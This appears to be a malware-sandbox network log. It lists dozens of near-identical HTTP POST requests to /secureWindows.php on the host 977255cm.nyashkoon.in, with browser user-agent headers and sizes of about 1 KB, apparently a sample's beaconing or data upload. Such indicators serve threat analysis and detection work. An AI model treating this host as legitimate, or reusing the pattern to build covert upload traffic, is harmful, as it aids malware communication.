Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1312Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
